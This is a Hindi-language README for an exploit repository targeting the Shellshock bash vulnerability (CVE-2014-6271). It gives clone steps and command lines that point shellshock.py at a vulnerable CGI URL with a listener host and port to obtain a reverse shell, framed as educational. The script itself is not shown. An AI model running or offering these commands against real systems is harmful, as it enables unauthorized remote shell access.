
शेलशॉक एक्सप्लॉइट (CVE-2014-6271)
यह रिपॉजिटरी एक ऐसी कमजोरी के लिए एक एक्सप्लॉइट रखती है जो यूनिक्स-आधारित सिस्टम को प्रभावित करती है। कृपया ध्यान दें कि यह केवल शैक्षिक उद्देश्यों के लिए बनाया गया एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है और इसका उपयोग जिम्मेदारी से किया जाना चाहिए।
यह एक्सप्लॉइट यह प्रदर्शित करने के लिए डिज़ाइन किया गया है कि शेलशॉक हमला कैसे काम करता है और कैसे इसका उपयोग एक दुर्भावनापूर्ण रूप से तैयार किए गए अनुरोध हेडर के माध्यम से सिस्टम पर शेल एक्सेस प्राप्त करने के लिए किया जा सकता है।
यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है। इस कोड या इसमें शामिल किसी भी जानकारी का उपयोग दुर्भावनापूर्ण उद्देश्यों के लिए न करें। हमेशा नैतिक दिशानिर्देशों का पालन करें और कानून का सम्मान करें।
उपयोग:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
उदाहरण:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
पूर्वापेक्षाएँ:
इस रिपॉजिटरी को अपनी स्थानीय मशीन पर क्लोन करें।
git clone https://github.com/AlissonFaoli/Shellshock.git
प्रोजेक्ट डायरेक्टरी पर जाएं।
cd Shellshock
shellshock.py स्क्रिप्ट चलाएं।
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
यह एक्सप्लॉइट MIT लाइसेंस के तहत जारी किया गया है। आप इसके बारे में अधिक जानकारी LICENSE फ़ाइल में पा सकते हैं।
यदि आपके पास इस एक्सप्लॉइट के बारे में कोई प्रश्न या चिंता है, तो कृपया लेखक से संपर्क करने में संकोच न करें